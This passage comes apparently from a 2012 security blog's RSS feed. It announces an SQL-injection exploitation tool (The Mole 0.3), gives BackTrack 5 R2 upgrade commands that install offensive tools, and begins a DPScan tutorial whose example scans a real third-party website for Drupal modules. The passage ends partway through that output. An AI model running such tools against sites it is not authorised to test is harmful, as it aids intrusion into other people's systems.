&lt;blockquote class="tr_bq"&gt;&lt;div style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;code class="western"&gt;git clone -b bugfix git://git.code.sf.net/p/themole/code themole-code&lt;/code&gt;&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;In order to put it up to date, before using it, update it by executing:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;span style="font-size: small;"&gt;&lt;code class="western"&gt;git pull origin bugfix&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/b&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;The Mole's release 0.3 is out! Several bugfixes have been made and new features were introduced. As:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
* Enabled injection through cookie paramters.&lt;br /&gt;
* New filtering mechanism enabling better manipulation and easier filter development.&lt;br /&gt;
* Added several of those filters.&lt;br /&gt;
* SQL Injections that return binary data are now exploitable.&lt;br /&gt;
* DMBS credentials listing.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;div style="text-align: center;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  H3 { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;br /&gt;
&lt;h3 style="text-align: center;"&gt;&lt;span style="color: #2323dc;"&gt;&lt;u&gt;The Mole SQLi Exploitation Tool Tutorial&lt;/u&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Complete tutorial with video explanation can be find &lt;a href="http://themole.nasel.com.ar/?q=tutorial" target="_blank"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-4762094419889595473?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=G47divQxr1I:qIgYryw2Jxg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=G47divQxr1I:qIgYryw2Jxg:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=G47divQxr1I:qIgYryw2Jxg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=G47divQxr1I:qIgYryw2Jxg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=G47divQxr1I:qIgYryw2Jxg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/G47divQxr1I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/G47divQxr1I/molesql-injection-exploitation-tool-v03.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-gASE49evQsc/T1EJfQSTcTI/AAAAAAAABCU/4t06NCZTGgs/s72-c/the_mole_logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/03/molesql-injection-exploitation-tool-v03.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1810539471893917243</guid><pubDate>Sat, 25 Feb 2012 15:08:00 +0000</pubDate><atom:updated>2012-02-25T07:08:09.884-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Review</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">BackTrack</category><category domain="http://www.blogger.com/atom/ns#">Backtrack5</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>Backtrack 5 R2 Release - Update to Backtrack 5 R2</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/0DwOPk3Xa6BIGAKK0w7qzevfmoo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0DwOPk3Xa6BIGAKK0w7qzevfmoo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/0DwOPk3Xa6BIGAKK0w7qzevfmoo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0DwOPk3Xa6BIGAKK0w7qzevfmoo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;How to update and upgrade your current (backtrack 5 R1) backtrack machine into the latest version backtrack 5 R2, however backtrack 5 R2 will be release on 1st March but the kernel of BT5 R2 has been arrived and you can update it by yourself or wait for the official release. The new kernel of 3.2.6 BT5 R2 will provide a more stable and complete&amp;nbsp;penetration&amp;nbsp;testing environment than ever before.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-2xGumL1TwuM/T0j305QAXcI/AAAAAAAABCM/qYyXtKl2F5o/s1600/portmap-update.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://2.bp.blogspot.com/-2xGumL1TwuM/T0j305QAXcI/AAAAAAAABCM/qYyXtKl2F5o/s400/portmap-update.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Open the terminal and update your backtrack 5 R1 installation.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;apt-get update &lt;br /&gt;
apt-get dist-upgrade &lt;br /&gt;
reboot&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Now you have the latest kernel.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444;"&gt;&lt;span style="font-size: small;"&gt;fix-splash &lt;br /&gt;
reboot&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;On the next reboot, you should see the red console splash screen appear.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Verify that you are running a 3.2.6 kernel:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444;"&gt;&lt;span style="font-size: small;"&gt;uname -a&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;You should see something like “Linux bt 3.2.6 …”&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Feel free to install any or all of the new tools featured in BackTrack 5 R2:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; &lt;/b&gt;&lt;span style="color: #444444;"&gt;apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Load the new security update and then upgrade it&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" &amp;gt;&amp;gt; /etc/apt/sources.list &lt;br /&gt;
apt-get update &lt;br /&gt;
apt-get dist-upgrade&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;It will be asked about the revision make sure to choose all by default and hit enter.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-D311N_xSDDU/T0j3AQFMMbI/AAAAAAAABCE/eliXqF_aOZk/s1600/update-grub-r2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://2.bp.blogspot.com/-D311N_xSDDU/T0j3AQFMMbI/AAAAAAAABCE/eliXqF_aOZk/s320/update-grub-r2.png" width="360" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Restart your distribution with the services.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt; &lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Backtrack 5 R2 will be officially release in March 1 with the complete information.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://www.backtrack-linux.org/backtrack/upgrading-to-backtrack-5-r2/" target="_blank"&gt;Source&lt;/a&gt; &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div&gt;&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1810539471893917243?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=v5jtzLJe7e0:tQTUDxt17u8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=v5jtzLJe7e0:tQTUDxt17u8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=v5jtzLJe7e0:tQTUDxt17u8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=v5jtzLJe7e0:tQTUDxt17u8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=v5jtzLJe7e0:tQTUDxt17u8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/v5jtzLJe7e0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/v5jtzLJe7e0/backtrack-5-r2-release-update-to.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-2xGumL1TwuM/T0j305QAXcI/AAAAAAAABCM/qYyXtKl2F5o/s72-c/portmap-update.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/02/backtrack-5-r2-release-update-to.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-6716341360102715193</guid><pubDate>Sat, 25 Feb 2012 14:45:00 +0000</pubDate><atom:updated>2012-02-25T06:45:34.180-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">EH Tools</category><category domain="http://www.blogger.com/atom/ns#">Drupal</category><category domain="http://www.blogger.com/atom/ns#">Random</category><category domain="http://www.blogger.com/atom/ns#">WordPress</category><title>DPScan Drupal Security Scanner Tutorial</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/XinMQTzlLkbJr7I-8Nzj7dwLAHw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/XinMQTzlLkbJr7I-8Nzj7dwLAHw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/XinMQTzlLkbJr7I-8Nzj7dwLAHw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/XinMQTzlLkbJr7I-8Nzj7dwLAHw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
  A:link { so-language: zxx }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/02/dpscan-drupal-security-scanner-tutorial.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-8148WiCQP7g/T0DAfG6R2wI/AAAAAAAABB4/tMpgFh7-7vw/s200/drupal.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;There are different CMS (content management system) are available like wordpress, Joomla, light CMS and Drupal. Security of each CMS is very important and as a penetration tester point we need to make a website secure by doing a penetration testing on it. There are different tools are available to enumerate into wordpress and joomla and to find the known vulnerabilities in wordpress and joomla but there is no tool for other common content management system like drupal.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Ali Elouafiq has released a wonderful tool to enumerate into drupal based CMS, this is the simple python script and anyone can easily use it. This &lt;a href="http://www.ehacking.net/search/label/Tutorial" style="color: blue;"&gt;tutorial&lt;/a&gt; will show you how DPScan enumerate the modules used by the drupal CMS.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;First of all go and &lt;a href="https://github.com/Rorchackh/Blue-Sky-Information-Security/downloads" style="color: blue;" target="_blank"&gt;download&lt;/a&gt; DPScan, I am using &lt;a href="http://www.ehacking.net/search/label/Backtrack5" style="color: blue;"&gt;backtrack 5 R1&lt;/a&gt; machine for this tutorial that has python by default but if you are using some other operating system like Windows and other Linux distribution then install python first.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Open your terminal and then locate the directory where you have download the python script of DPScan, remember you can copy the script and then paste in your word editor then save it to whatever.py&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;The best practice is to download and then unzip the script, I have downloaded and unzip the script in my desktop and then locate the desktop is the terminal then the command is like this:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;root@bt:~/Desktop# python DPScan.py  &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;DRUPAL Modules Enumerator v0.1beta-- written by Ali Elouafiq 2012 &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&amp;lt;ScriptName&amp;gt; [filename.txt] &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&amp;lt;ScriptName&amp;gt; [URL] &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&amp;lt;ScriptName&amp;gt; [URL] user password // FOR HTTP AUTHORIZATION &lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-family: inherit;"&gt;&lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;A simple enumeration&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;root@bt:~/Desktop# python DPScan.py www.mtv.co.uk &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;node &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;user_optin &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;fckeditor &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;system &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;gsa &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;mtv_videobrowse &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;nice_menus &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;user &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;cck &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;top_tabs &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: small;"&gt;panels &lt;/span&gt;&lt;/div&gt;&lt;div style="color: #444444; margin-bottom: 0in;"&gt;&lt;span style="font-size: 